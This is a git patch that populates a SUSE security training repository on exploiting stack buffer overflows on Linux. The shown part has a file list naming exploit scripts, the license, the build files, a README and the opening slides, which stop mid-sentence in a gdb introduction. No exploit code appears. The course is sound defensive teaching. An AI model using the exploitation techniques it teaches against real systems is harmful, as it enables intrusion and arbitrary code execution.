From 55192321063cba66f5958390db2d22be65a62a51 Mon Sep 17 00:00:00 2001 From: Matthias Gerstner Date: Thu, 2 Mar 2023 14:05:24 +0100 Subject: [PATCH] initial population --- LICENSE | 438 ++++ Makefile | 22 + README.md | 51 + bo_training.adoc | 1897 +++++++++++++++++ examples/.gitignore | 8 + examples/address_space_basics/Makefile | 13 + examples/address_space_basics/README.md | 20 + examples/address_space_basics/simple.c | 44 + examples/as_intro/Makefile | 12 + examples/as_intro/README.md | 87 + examples/as_intro/intro.s | 31 + examples/as_stack/.gitignore | 2 + examples/as_stack/Makefile | 12 + examples/as_stack/README.md | 63 + examples/as_stack/stack.s | 66 + examples/buffer_doom/README.md | 125 ++ examples/buffer_doom/doom_exploiter.py | 344 +++ examples/buffer_doom/gen_exploit.py | 1 + examples/code_injection/.gitignore | 1 + examples/code_injection/Makefile | 16 + examples/code_injection/README.md | 52 + examples/code_injection/gen_exploit.py | 163 ++ examples/code_injection/kitty2.c | 49 + examples/common/Makefile | 15 + examples/complex_exec_snippet/.gitignore | 1 + examples/complex_exec_snippet/Makefile | 14 + examples/complex_exec_snippet/README.md | 5 + examples/complex_exec_snippet/exec_asm.c | 122 ++ examples/complex_exec_snippet/exec_bin.c | 66 + examples/connman_dns/Makefile | 16 + examples/connman_dns/README.md | 307 +++ examples/connman_dns/connexec.py | 268 +++ examples/connman_dns/enter_namespace.py | 92 + examples/connman_dns/gen_exploit.py | 1 + .../connman_dns/geteuid-preload/geteuid.c | 19 + examples/doc2exploit/README.md | 202 ++ examples/doc2exploit/bmp.txt | 15 + examples/doc2exploit/gen_exploit.py | 1 + examples/doc2exploit/poc/poc.bmp | Bin 0 -> 16442 bytes examples/doc2exploit/poc/poc.html | 8 + examples/exec_snippet/.gitignore | 1 + examples/exec_snippet/Makefile | 14 + examples/exec_snippet/README.md | 46 + examples/exec_snippet/exec_asm.c | 118 + examples/exec_snippet/exec_bin.c | 62 + examples/exit_snippet/.gitignore | 0 examples/exit_snippet/Makefile | 15 + examples/exit_snippet/README.md | 48 + examples/exit_snippet/exit_asm.c | 36 + examples/exit_snippet/exit_bin.c | 59 + examples/gdb_intro/.gitignore | 2 + examples/gdb_intro/Makefile | 13 + examples/gdb_intro/README.md | 108 + examples/gdb_intro/gdbtest.c | 32 + examples/lost_memset/.gitignore | 2 + examples/lost_memset/Makefile | 13 + examples/lost_memset/README.md | 10 + examples/lost_memset/lost_memset.c | 40 + examples/param_injection/.gitignore | 1 + examples/param_injection/Makefile | 15 + examples/param_injection/README.md | 38 + examples/param_injection/replace_param.py | 103 + examples/param_injection/run_safe_prog.c | 60 + examples/soupstrike/README.md | 127 ++ examples/soupstrike/gen_exploit.py | 1 + examples/soupstrike/hit-the-soup.py | 30 + examples/stack_overread/.gitignore | 1 + examples/stack_overread/Makefile | 13 + examples/stack_overread/README.md | 14 + examples/stack_overread/dump_head.c | 101 + examples/uninitialized_data/.gitignore | 3 + examples/uninitialized_data/Makefile | 20 + examples/uninitialized_data/README.md | 63 + examples/uninitialized_data/common.h | 22 + examples/uninitialized_data/pseudo_random.c | 44 + examples/uninitialized_data/random_client.c | 127 ++ examples/uninitialized_data/random_svc.c | 219 ++ examples/zombie_call/.gitignore | 1 + examples/zombie_call/Makefile | 18 + examples/zombie_call/README.md | 18 + examples/zombie_call/call_zombie.py | 227 ++ examples/zombie_call/kitty.c | 39 + images/addr_space_layout1.png | Bin 0 -> 25642 bytes images/addr_space_layout2.png | Bin 0 -> 56975 bytes images/addr_space_layout3.png | Bin 0 -> 70971 bytes images/overflow_structure.png | Bin 0 -> 46205 bytes images/stack_clash.png | Bin 0 -> 35388 bytes images/stack_frame1.png | Bin 0 -> 66476 bytes images/stack_frame2.png | Bin 0 -> 72588 bytes images/stack_frame3.png | Bin 0 -> 82297 bytes images/stack_frame4.png | Bin 0 -> 94655 bytes inkscape/addr_space_layout.svg | 782 +++++++ inkscape/overflow_structure.svg | 426 ++++ inkscape/stack_clash.svg | 510 +++++ inkscape/stack_frame.svg | 530 +++++ themes/install.sh | 14 + themes/suse/suse.css | 558 +++++ 97 files changed, 9413 insertions(+) create mode 100644 LICENSE create mode 100644 Makefile create mode 100644 README.md create mode 100644 bo_training.adoc create mode 100644 examples/.gitignore create mode 100644 examples/address_space_basics/Makefile create mode 100644 examples/address_space_basics/README.md create mode 100644 examples/address_space_basics/simple.c create mode 100644 examples/as_intro/Makefile create mode 100644 examples/as_intro/README.md create mode 100644 examples/as_intro/intro.s create mode 100644 examples/as_stack/.gitignore create mode 100644 examples/as_stack/Makefile create mode 100644 examples/as_stack/README.md create mode 100644 examples/as_stack/stack.s create mode 100644 examples/buffer_doom/README.md create mode 100755 examples/buffer_doom/doom_exploiter.py create mode 120000 examples/buffer_doom/gen_exploit.py create mode 100644 examples/code_injection/.gitignore create mode 100644 examples/code_injection/Makefile create mode 100644 examples/code_injection/README.md create mode 100755 examples/code_injection/gen_exploit.py create mode 100644 examples/code_injection/kitty2.c create mode 100644 examples/common/Makefile create mode 100644 examples/complex_exec_snippet/.gitignore create mode 100644 examples/complex_exec_snippet/Makefile create mode 100644 examples/complex_exec_snippet/README.md create mode 100644 examples/complex_exec_snippet/exec_asm.c create mode 100644 examples/complex_exec_snippet/exec_bin.c create mode 100644 examples/connman_dns/Makefile create mode 100644 examples/connman_dns/README.md create mode 100755 examples/connman_dns/connexec.py create mode 100755 examples/connman_dns/enter_namespace.py create mode 120000 examples/connman_dns/gen_exploit.py create mode 100644 examples/connman_dns/geteuid-preload/geteuid.c create mode 100644 examples/doc2exploit/README.md create mode 100644 examples/doc2exploit/bmp.txt create mode 120000 examples/doc2exploit/gen_exploit.py create mode 100644 examples/doc2exploit/poc/poc.bmp create mode 100644 examples/doc2exploit/poc/poc.html create mode 100644 examples/exec_snippet/.gitignore create mode 100644 examples/exec_snippet/Makefile create mode 100644 examples/exec_snippet/README.md create mode 100644 examples/exec_snippet/exec_asm.c create mode 100644 examples/exec_snippet/exec_bin.c create mode 100644 examples/exit_snippet/.gitignore create mode 100644 examples/exit_snippet/Makefile create mode 100644 examples/exit_snippet/README.md create mode 100644 examples/exit_snippet/exit_asm.c create mode 100644 examples/exit_snippet/exit_bin.c create mode 100644 examples/gdb_intro/.gitignore create mode 100644 examples/gdb_intro/Makefile create mode 100644 examples/gdb_intro/README.md create mode 100644 examples/gdb_intro/gdbtest.c create mode 100644 examples/lost_memset/.gitignore create mode 100644 examples/lost_memset/Makefile create mode 100644 examples/lost_memset/README.md create mode 100644 examples/lost_memset/lost_memset.c create mode 100644 examples/param_injection/.gitignore create mode 100644 examples/param_injection/Makefile create mode 100644 examples/param_injection/README.md create mode 100755 examples/param_injection/replace_param.py create mode 100644 examples/param_injection/run_safe_prog.c create mode 100644 examples/soupstrike/README.md create mode 120000 examples/soupstrike/gen_exploit.py create mode 100755 examples/soupstrike/hit-the-soup.py create mode 100644 examples/stack_overread/.gitignore create mode 100644 examples/stack_overread/Makefile create mode 100644 examples/stack_overread/README.md create mode 100644 examples/stack_overread/dump_head.c create mode 100644 examples/uninitialized_data/.gitignore create mode 100644 examples/uninitialized_data/Makefile create mode 100644 examples/uninitialized_data/README.md create mode 100644 examples/uninitialized_data/common.h create mode 100644 examples/uninitialized_data/pseudo_random.c create mode 100644 examples/uninitialized_data/random_client.c create mode 100644 examples/uninitialized_data/random_svc.c create mode 100644 examples/zombie_call/.gitignore create mode 100644 examples/zombie_call/Makefile create mode 100644 examples/zombie_call/README.md create mode 100755 examples/zombie_call/call_zombie.py create mode 100644 examples/zombie_call/kitty.c create mode 100644 images/addr_space_layout1.png create mode 100644 images/addr_space_layout2.png create mode 100644 images/addr_space_layout3.png create mode 100644 images/overflow_structure.png create mode 100644 images/stack_clash.png create mode 100644 images/stack_frame1.png create mode 100644 images/stack_frame2.png create mode 100644 images/stack_frame3.png create mode 100644 images/stack_frame4.png create mode 100644 inkscape/addr_space_layout.svg create mode 100644 inkscape/overflow_structure.svg create mode 100644 inkscape/stack_clash.svg create mode 100644 inkscape/stack_frame.svg create mode 100755 themes/install.sh create mode 100644 themes/suse/suse.css diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..7cdbe0b --- /dev/null +++ b/LICENSE @@ -0,0 +1,438 @@ +Attribution-NonCommercial-ShareAlike 4.0 International + +======================================================================= + +Creative Commons Corporation ("Creative Commons") is not a law firm and +does not provide legal services or legal advice. Distribution of +Creative Commons public licenses does not create a lawyer-client or +other relationship. Creative Commons makes its licenses and related +information available on an "as-is" basis. Creative Commons gives no +warranties regarding its licenses, any material licensed under their +terms and conditions, or any related information. Creative Commons +disclaims all liability for damages resulting from their use to the +fullest extent possible. + +Using Creative Commons Public Licenses + +Creative Commons public licenses provide a standard set of terms and +conditions that creators and other rights holders may use to share +original works of authorship and other material subject to copyright +and certain other rights specified in the public license below. The +following considerations are for informational purposes only, are not +exhaustive, and do not form part of our licenses. + + Considerations for licensors: Our public licenses are + intended for use by those authorized to give the public + permission to use material in ways otherwise restricted by + copyright and certain other rights. Our licenses are + irrevocable. Licensors should read and understand the terms + and conditions of the license they choose before applying it. + Licensors should also secure all rights necessary before + applying our licenses so that the public can reuse the + material as expected. Licensors should clearly mark any + material not subject to the license. This includes other CC- + licensed material, or material used under an exception or + limitation to copyright. More considerations for licensors: + wiki.creativecommons.org/Considerations_for_licensors + + Considerations for the public: By using one of our public + licenses, a licensor grants the public permission to use the + licensed material under specified terms and conditions. If + the licensor's permission is not necessary for any reason--for + example, because of any applicable exception or limitation to + copyright--then that use is not regulated by the license. Our + licenses grant only permissions under copyright and certain + other rights that a licensor has authority to grant. Use of + the licensed material may still be restricted for other + reasons, including because others have copyright or other + rights in the material. A licensor may make special requests, + such as asking that all changes be marked or described. + Although not required by our licenses, you are encouraged to + respect those requests where reasonable. More considerations + for the public: + wiki.creativecommons.org/Considerations_for_licensees + +======================================================================= + +Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International +Public License + +By exercising the Licensed Rights (defined below), You accept and agree +to be bound by the terms and conditions of this Creative Commons +Attribution-NonCommercial-ShareAlike 4.0 International Public License +("Public License"). To the extent this Public License may be +interpreted as a contract, You are granted the Licensed Rights in +consideration of Your acceptance of these terms and conditions, and the +Licensor grants You such rights in consideration of benefits the +Licensor receives from making the Licensed Material available under +these terms and conditions. + + +Section 1 -- Definitions. + + a. Adapted Material means material subject to Copyright and Similar + Rights that is derived from or based upon the Licensed Material + and in which the Licensed Material is translated, altered, + arranged, transformed, or otherwise modified in a manner requiring + permission under the Copyright and Similar Rights held by the + Licensor. For purposes of this Public License, where the Licensed + Material is a musical work, performance, or sound recording, + Adapted Material is always produced where the Licensed Material is + synched in timed relation with a moving image. + + b. Adapter's License means the license You apply to Your Copyright + and Similar Rights in Your contributions to Adapted Material in + accordance with the terms and conditions of this Public License. + + c. BY-NC-SA Compatible License means a license listed at + creativecommons.org/compatiblelicenses, approved by Creative + Commons as essentially the equivalent of this Public License. + + d. Copyright and Similar Rights means copyright and/or similar rights + closely related to copyright including, without limitation, + performance, broadcast, sound recording, and Sui Generis Database + Rights, without regard to how the rights are labeled or + categorized. For purposes of this Public License, the rights + specified in Section 2(b)(1)-(2) are not Copyright and Similar + Rights. + + e. Effective Technological Measures means those measures that, in the + absence of proper authority, may not be circumvented under laws + fulfilling obligations under Article 11 of the WIPO Copyright + Treaty adopted on December 20, 1996, and/or similar international + agreements. + + f. Exceptions and Limitations means fair use, fair dealing, and/or + any other exception or limitation to Copyright and Similar Rights + that applies to Your use of the Licensed Material. + + g. License Elements means the license attributes listed in the name + of a Creative Commons Public License. The License Elements of this + Public License are Attribution, NonCommercial, and ShareAlike. + + h. Licensed Material means the artistic or literary work, database, + or other material to which the Licensor applied this Public + License. + + i. Licensed Rights means the rights granted to You subject to the + terms and conditions of this Public License, which are limited to + all Copyright and Similar Rights that apply to Your use of the + Licensed Material and that the Licensor has authority to license. + + j. Licensor means the individual(s) or entity(ies) granting rights + under this Public License. + + k. NonCommercial means not primarily intended for or directed towards + commercial advantage or monetary compensation. For purposes of + this Public License, the exchange of the Licensed Material for + other material subject to Copyright and Similar Rights by digital + file-sharing or similar means is NonCommercial provided there is + no payment of monetary compensation in connection with the + exchange. + + l. Share means to provide material to the public by any means or + process that requires permission under the Licensed Rights, such + as reproduction, public display, public performance, distribution, + dissemination, communication, or importation, and to make material + available to the public including in ways that members of the + public may access the material from a place and at a time + individually chosen by them. + + m. Sui Generis Database Rights means rights other than copyright + resulting from Directive 96/9/EC of the European Parliament and of + the Council of 11 March 1996 on the legal protection of databases, + as amended and/or succeeded, as well as other essentially + equivalent rights anywhere in the world. + + n. You means the individual or entity exercising the Licensed Rights + under this Public License. Your has a corresponding meaning. + + +Section 2 -- Scope. + + a. License grant. + + 1. Subject to the terms and conditions of this Public License, + the Licensor hereby grants You a worldwide, royalty-free, + non-sublicensable, non-exclusive, irrevocable license to + exercise the Licensed Rights in the Licensed Material to: + + a. reproduce and Share the Licensed Material, in whole or + in part, for NonCommercial purposes only; and + + b. produce, reproduce, and Share Adapted Material for + NonCommercial purposes only. + + 2. Exceptions and Limitations. For the avoidance of doubt, where + Exceptions and Limitations apply to Your use, this Public + License does not apply, and You do not need to comply with + its terms and conditions. + + 3. Term. The term of this Public License is specified in Section + 6(a). + + 4. Media and formats; technical modifications allowed. The + Licensor authorizes You to exercise the Licensed Rights in + all media and formats whether now known or hereafter created, + and to make technical modifications necessary to do so. The + Licensor waives and/or agrees not to assert any right or + authority to forbid You from making technical modifications + necessary to exercise the Licensed Rights, including + technical modifications necessary to circumvent Effective + Technological Measures. For purposes of this Public License, + simply making modifications authorized by this Section 2(a) + (4) never produces Adapted Material. + + 5. Downstream recipients. + + a. Offer from the Licensor -- Licensed Material. Every + recipient of the Licensed Material automatically + receives an offer from the Licensor to exercise the + Licensed Rights under the terms and conditions of this + Public License. + + b. Additional offer from the Licensor -- Adapted Material. + Every recipient of Adapted Material from You + automatically receives an offer from the Licensor to + exercise the Licensed Rights in the Adapted Material + under the conditions of the Adapter's License You apply. + + c. No downstream restrictions. You may not offer or impose + any additional or different terms or conditions on, or + apply any Effective Technological Measures to, the + Licensed Material if doing so restricts exercise of the + Licensed Rights by any recipient of the Licensed + Material. + + 6. No endorsement. Nothing in this Public License constitutes or + may be construed as permission to assert or imply that You + are, or that Your use of the Licensed Material is, connected + with, or sponsored, endorsed, or granted official status by, + the Licensor or others designated to receive attribution as + provided in Section 3(a)(1)(A)(i). + + b. Other rights. + + 1. Moral rights, such as the right of integrity, are not + licensed under this Public License, nor are publicity, + privacy, and/or other similar personality rights; however, to + the extent possible, the Licensor waives and/or agrees not to + assert any such rights held by the Licensor to the limited + extent necessary to allow You to exercise the Licensed + Rights, but not otherwise. + + 2. Patent and trademark rights are not licensed under this + Public License. + + 3. To the extent possible, the Licensor waives any right to + collect royalties from You for the exercise of the Licensed + Rights, whether directly or through a collecting society + under any voluntary or waivable statutory or compulsory + licensing scheme. In all other cases the Licensor expressly + reserves any right to collect such royalties, including when + the Licensed Material is used other than for NonCommercial + purposes. + + +Section 3 -- License Conditions. + +Your exercise of the Licensed Rights is expressly made subject to the +following conditions. + + a. Attribution. + + 1. If You Share the Licensed Material (including in modified + form), You must: + + a. retain the following if it is supplied by the Licensor + with the Licensed Material: + + i. identification of the creator(s) of the Licensed + Material and any others designated to receive + attribution, in any reasonable manner requested by + the Licensor (including by pseudonym if + designated); + + ii. a copyright notice; + + iii. a notice that refers to this Public License; + + iv. a notice that refers to the disclaimer of + warranties; + + v. a URI or hyperlink to the Licensed Material to the + extent reasonably practicable; + + b. indicate if You modified the Licensed Material and + retain an indication of any previous modifications; and + + c. indicate the Licensed Material is licensed under this + Public License, and include the text of, or the URI or + hyperlink to, this Public License. + + 2. You may satisfy the conditions in Section 3(a)(1) in any + reasonable manner based on the medium, means, and context in + which You Share the Licensed Material. For example, it may be + reasonable to satisfy the conditions by providing a URI or + hyperlink to a resource that includes the required + information. + 3. If requested by the Licensor, You must remove any of the + information required by Section 3(a)(1)(A) to the extent + reasonably practicable. + + b. ShareAlike. + + In addition to the conditions in Section 3(a), if You Share + Adapted Material You produce, the following conditions also apply. + + 1. The Adapter's License You apply must be a Creative Commons + license with the same License Elements, this version or + later, or a BY-NC-SA Compatible License. + + 2. You must include the text of, or the URI or hyperlink to, the + Adapter's License You apply. You may satisfy this condition + in any reasonable manner based on the medium, means, and + context in which You Share Adapted Material. + + 3. You may not offer or impose any additional or different terms + or conditions on, or apply any Effective Technological + Measures to, Adapted Material that restrict exercise of the + rights granted under the Adapter's License You apply. + + +Section 4 -- Sui Generis Database Rights. + +Where the Licensed Rights include Sui Generis Database Rights that +apply to Your use of the Licensed Material: + + a. for the avoidance of doubt, Section 2(a)(1) grants You the right + to extract, reuse, reproduce, and Share all or a substantial + portion of the contents of the database for NonCommercial purposes + only; + + b. if You include all or a substantial portion of the database + contents in a database in which You have Sui Generis Database + Rights, then the database in which You have Sui Generis Database + Rights (but not its individual contents) is Adapted Material, + including for purposes of Section 3(b); and + + c. You must comply with the conditions in Section 3(a) if You Share + all or a substantial portion of the contents of the database. + +For the avoidance of doubt, this Section 4 supplements and does not +replace Your obligations under this Public License where the Licensed +Rights include other Copyright and Similar Rights. + + +Section 5 -- Disclaimer of Warranties and Limitation of Liability. + + a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE + EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS + AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF + ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS, + IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION, + WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR + PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS, + ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT + KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT + ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU. + + b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE + TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, + NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT, + INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES, + COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR + USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN + ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR + DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR + IN PART, THIS LIMITATION MAY NOT APPLY TO YOU. + + c. The disclaimer of warranties and limitation of liability provided + above shall be interpreted in a manner that, to the extent + possible, most closely approximates an absolute disclaimer and + waiver of all liability. + + +Section 6 -- Term and Termination. + + a. This Public License applies for the term of the Copyright and + Similar Rights licensed here. However, if You fail to comply with + this Public License, then Your rights under this Public License + terminate automatically. + + b. Where Your right to use the Licensed Material has terminated under + Section 6(a), it reinstates: + + 1. automatically as of the date the violation is cured, provided + it is cured within 30 days of Your discovery of the + violation; or + + 2. upon express reinstatement by the Licensor. + + For the avoidance of doubt, this Section 6(b) does not affect any + right the Licensor may have to seek remedies for Your violations + of this Public License. + + c. For the avoidance of doubt, the Licensor may also offer the + Licensed Material under separate terms or conditions or stop + distributing the Licensed Material at any time; however, doing so + will not terminate this Public License. + + d. Sections 1, 5, 6, 7, and 8 survive termination of this Public + License. + + +Section 7 -- Other Terms and Conditions. + + a. The Licensor shall not be bound by any additional or different + terms or conditions communicated by You unless expressly agreed. + + b. Any arrangements, understandings, or agreements regarding the + Licensed Material not stated herein are separate from and + independent of the terms and conditions of this Public License. + + +Section 8 -- Interpretation. + + a. For the avoidance of doubt, this Public License does not, and + shall not be interpreted to, reduce, limit, restrict, or impose + conditions on any use of the Licensed Material that could lawfully + be made without permission under this Public License. + + b. To the extent possible, if any provision of this Public License is + deemed unenforceable, it shall be automatically reformed to the + minimum extent necessary to make it enforceable. If the provision + cannot be reformed, it shall be severed from this Public License + without affecting the enforceability of the remaining terms and + conditions. + + c. No term or condition of this Public License will be waived and no + failure to comply consented to unless expressly agreed to by the + Licensor. + + d. Nothing in this Public License constitutes or may be interpreted + as a limitation upon, or waiver of, any privileges and immunities + that apply to the Licensor or You, including from the legal + processes of any jurisdiction or authority. + +======================================================================= + +Creative Commons is not a party to its public +licenses. Notwithstanding, Creative Commons may elect to apply one of +its public licenses to material it publishes and in those instances +will be considered the “Licensor.” The text of the Creative Commons +public licenses is dedicated to the public domain under the CC0 Public +Domain Dedication. Except for the limited purpose of indicating that +material is shared under a Creative Commons public license or as +otherwise permitted by the Creative Commons policies published at +creativecommons.org/policies, Creative Commons does not authorize the +use of the trademark "Creative Commons" or any other trademark or logo +of Creative Commons without its prior written consent including, +without limitation, in connection with any unauthorized modifications +to any of its public licenses or any other arrangements, +understandings, or agreements concerning use of licensed material. For +the avoidance of doubt, this paragraph does not form part of the +public licenses. + +Creative Commons may be contacted at creativecommons.org. + diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..97ea5cd --- /dev/null +++ b/Makefile @@ -0,0 +1,22 @@ +IMAGES = $(wildcard images/*.png) + +all: bo_training.html + +# for the suse theme I'm currently using a custom theme +# custom themes need to reside in the home directory an we can't pass an +# alternative location to asciidoc it seems +# therefore we "make" the theme via symlinks +$(HOME)/.asciidoc/themes/suse/suse.css: ./themes/suse/suse.css ./themes/install.sh + ./themes/install.sh + +theme: $(HOME)/.asciidoc/themes/suse/suse.css + +# slidy backend is part of the standard asciidoc +bo_training.html: bo_training.adoc $(IMAGES) $(HOME)/.asciidoc/themes/suse/suse.css + /usr/bin/asciidoc --backend slidy -a theme=suse bo_training.adoc + +clean: + rm bo_training.html + +show: bo_training.html + xdg-open bo_training.html diff --git a/README.md b/README.md new file mode 100644 index 0000000..51eb62f --- /dev/null +++ b/README.md @@ -0,0 +1,51 @@ +Training Material "Anatomy of Buffer Overflows and Low Level Security" +====================================================================== + +Overview +-------- + +This repository contains presentation slides and training examples for +learning about exploitation of stack buffer overflows on Linux systems. The +target audience is beginners with existing basic knowledge about C programming +and Linux. The training covers the following topics: + +- Using `gdb` for debugging, inspecting buffer overflows during runtime and + interacting with the program also on assembler level. +- A basic introduction to assembler programming on `i386` / `x86_64` + processors. +- Explanation of a computer's address space, the function and management of + stack and heap memory, how function calls are setup, how system calls are + setup and related topics. +- Typical techniques to exploit a stack buffer overflow with the aim of + arbitrary code execution. Various examples of growing complexity help to get + in touch with the topic step by step. +- Modern protection measures to prevent stack buffer exploits are discussed. + +The examples are all tailored towards running them on current openSUSE Linux +distributions. + +The material is used for a 3 to 4 day training for trainees in computer +science. Due to the advanced nature of the topics also more experienced +engineers that aren't familiar with low level programming and buffer overflows +can profit at least from parts of the training. + +How to Build +------------ + +This presentation is based on `asciidoc`. Installing it should be enough to +successfully run `make`. The result will be a single HTML file containing also +embedded images. The presentation can be opened in a regular web browser. + +Licensing +--------- + +The content of this repository (the presentation slides, PNG images and their +SVG sources as well as all example code and its documentation) are available +under the Creative Commons license BY-NC-SA 4.0. See the `LICENSE` file in the +repository or [online][1]. + +[1]: https://creativecommons.org/licenses/by-nc-sa/4.0 + +This basically means you can use it, share it, adapt it for non-commercial +uses if you mention the original author and source and grant the same rights +defined in the license to others. diff --git a/bo_training.adoc b/bo_training.adoc new file mode 100644 index 0000000..6c06cb0 --- /dev/null +++ b/bo_training.adoc @@ -0,0 +1,1897 @@ +Training: Anatomy of Buffer Overflows and Low Level Security +============================================================ +:author: Matthias Gerstner - Security Engineer - SUSE Security Team +:backend: slidy +:max-width: 95% +:data-uri: +:icons: +:homepage: http://www.suse.com/security + +About the SUSE Security Team +---------------------------- + +=== Where to find us + +[role="incremental"] +* Find us on our website http://www.suse.com/security +* Contact us on our mailing list at security@suse.de +* On our internal IRC in `#security` +* On Slack in `#discuss-security` +* Or me personally at matthias.gerstner@suse.de +* Or sometimes also in person in the office. + +About the SUSE Security Team +---------------------------- + +=== What we do - reactive security + +[role="incremental"] +* Monitoring upstream software for security reports / fixes. +* Assessing the severity of security issues. +* Taking care of the security / maintenance update process: +[role="incremental"] +** Requesting security updates from package maintainers. +** Reviewing security update submissions in OBS. +** Communicating with customers and users about security concerns in SUSE + products. +** Managing embargoed security issues. + +About the SUSE Security Team +---------------------------- + +=== What we do - proactive security + +[role="incremental"] +* We do security oriented reviews of new products/packages, or new versions + thereof. +* We are managing whitelisting restrictions of security sensitive components + and features in OBS and IBS and perform reviews of these components. +* We are communicating best practices in secure software development, try to + raise awareness in general. +* We are supporting other teams with security related frameworks like SELinux, + AppArmor and others. +* Red Team Exercises: Testing our own IT infrastructure. +* "Hiring" of Security Champions in other teams. + +About the SUSE Security Team +---------------------------- + +=== What we don't do + +[role="incremental"] +* Security Certifications (FIPS, CC, etc.). This is now handled by the + separate certifications team. +* IT security (Infra, corporate IT). We do support in some areas but we are + not formally responsible. + +About Me +-------- + +=== What I do + +[role="incremental"] +* I am maintainer of trusted computing related packages: +** tpm related packages ('tpm-tools', 'trousers', 'tpm2-0-tss', 'tboot', ...) +* I mainly conduct code reviews of e.g. new D-Bus services, setuid programs, + PAM modules and other security relevant changes. +* I am sometimes checking security bugfixes in updates, communicate with + upstream, provide security improvements. +* I investigate major security issues discussed in the community. +* At times I evaluate new security features (e.g. kernel security frameworks) +* If nothing else is requested from us then I do *truly* proactive reviews of + interesting components e.g. network services, security sensitive features in + the distro. + +About Me +-------- + +=== My Experience + +[role="incremental"] +* 10 years experience as a Software developer and architect in embedded and + security focused areas. +* For nearly 7 years now in the security review business. +* Mostly system programming in `C` and `C++`. +* Cross platform development Windows/Linux/QNX. +* Linux experience for about 20 years. + +Talk to us! +----------- + +Don't hesitate to contact us if you have any questions or need advice about +security topics. + +We'd like to check on things with you *before* they're finished and released. +Security should be considered from the very beginning, not as an afterthought. + +About this Training +------------------- + +[role="incremental"] +* In this training we will thoroughly investigate one of the most widespread + and most dangerous classes of security issues: buffer overflows. +* We will have a look at the different dangers that come with these flaws and +how to exploit them. +* We do this by putting ourselves in the role of an attacker. This way we can + better understand the needs of secure development practices. +* This training is supposed to be hands-on and to provide practical guidance for + the everyday work as a programmer. Interleaved with the theory we will talk + about, we will be looking at and experimenting with practical examples. + +Structure of the Training +------------------------- + +[role="incremental"] +* Day 1 +[role="incremental"] +** Introduction to debugging with 'gdb': We will use it later to construct exploits. +** Introduction to Assembler programming. +** Basic understanding of address space layout, memory management, stack + management. +* Day 2 +[role="incremental"] +** Finishing the Assembler/memory management introduction. +** Construction of typical stack buffer overflow exploits. +** Hands-On examples for us to try out the real things and experiment. +* Day 3 +[role="incremental"] +** A fully-fledged example of arbitrary code execution in production software. +** Some less obvious types of stack programming errors and vulnerabilities. +* Day 4 +[role="incremental"] +** Modern protection mechanisms against common types of exploits. +** Dangers that still remain even with todays protection technology. +** A look onto heap buffer overflow issues. + +Prerequisites +------------- + +[role="incremental"] +* General understanding of C programming. +* General understanding of Linux. +* The topics can be difficult to grasp at times: +[role="incremental"] +** Because of all the low level details and new concepts... +** I'd like to everybody understand the basic principles. +** Please tell me if you're lagging behind so I can repeat or explain from a + different angle. +* There's a number of hands-on examples we will discuss and you can +experiment with them on your own during and after the training: +[role="incremental"] +** You will need a computer running openSUSE or similar Linux. +** The instructions in the examples have been tested on openSUSE Tumbleweed + and on Leap 15.4 +** You need to have installed a suitable development environment (`zypper install -t pattern +devel_C_C++`) and GDB (`zypper install gdb`). +** And some extra packages that will be mentioned as we encounter them. + +Why Even Bother about this "old school" Low Level Stuff? +-------------------------------------------------------- + +There is an ongoing shift in educational content for engineers and in the daily +work of many computer scientists. The C programming language as the +predominant one in the Linux ecosystem is slowly fading and is being replaced +by safer and more abstract ones like `Rust` or `Golang`. Classical buffer +overflows are no major concern there anymore. Why should we even bother to +understand the "old" low level stuff? + +[role="incremental"] +* A lot of existing C programs will continue to accompany us probably for more + decades to come so some people will have to deal with it the one way or the + other. +* The new programming languages are not better on all levels. If it is about + low footprint and full control classical C or C++ might still be viable + candidates to use even for new projects. Or for the modern programming + environments themselves to be created. +* The reality on the lower levels of computing doesn't change even if we use + modern programming languages. Understanding the principles of how the + computer and the operating system work usually make you a better programmer, + Admin etc. even if you don't act on this level in your everyday work. + +An Introduction to 'gdb' +------------------------ + +[role="incremental"] +* The GNU debugger 'gdb' is the standard debugger for Linux and also for + other UNIX like operating systems. +* It is an interactive console program that understands a variety of + *compiled* programming languages (basically all the languages supported + by the GNU compiler suite). +* So what does it do? +[role="incremental"] +** It can start new programs directly in the debugger. +** It can attach to already running programs. +** It can match source code locations to the binary machine code the program + is currently running. +** It can stop the program when it reaches a certain code location + (breakpoints). +** When stopped you can inspect the program state i.e. variable contents, + addresses, the call stack and a lot more. +** You can also modify parts of the program while it is running or call + functions to some extent. +* There also exist graphical frontends to 'gdb' of varying quality that are + supposed to ease its use (e.g. 'ddd', 'kdbg', 'nemiver'). But knowing the ropes + on the command line is always useful and efficient so that's why we + concentrate on that. The command line doesn't need any extra setup, is also + easily available remotely via SSH and provides the full feature set that 'gdb' + offers. +* 'gdb' also supports a basic terminal based UI called 'tui' that is an + integral part of the command line program. + +An Introduction to 'gdb' +------------------------ + +This introduction to 'gdb' will cover more than what is strictly needed for +the scope of this training. But we still need to keep it resonably short for +being able to cover all the other topics we have. + +Preparations for Debugging a C/C++ based 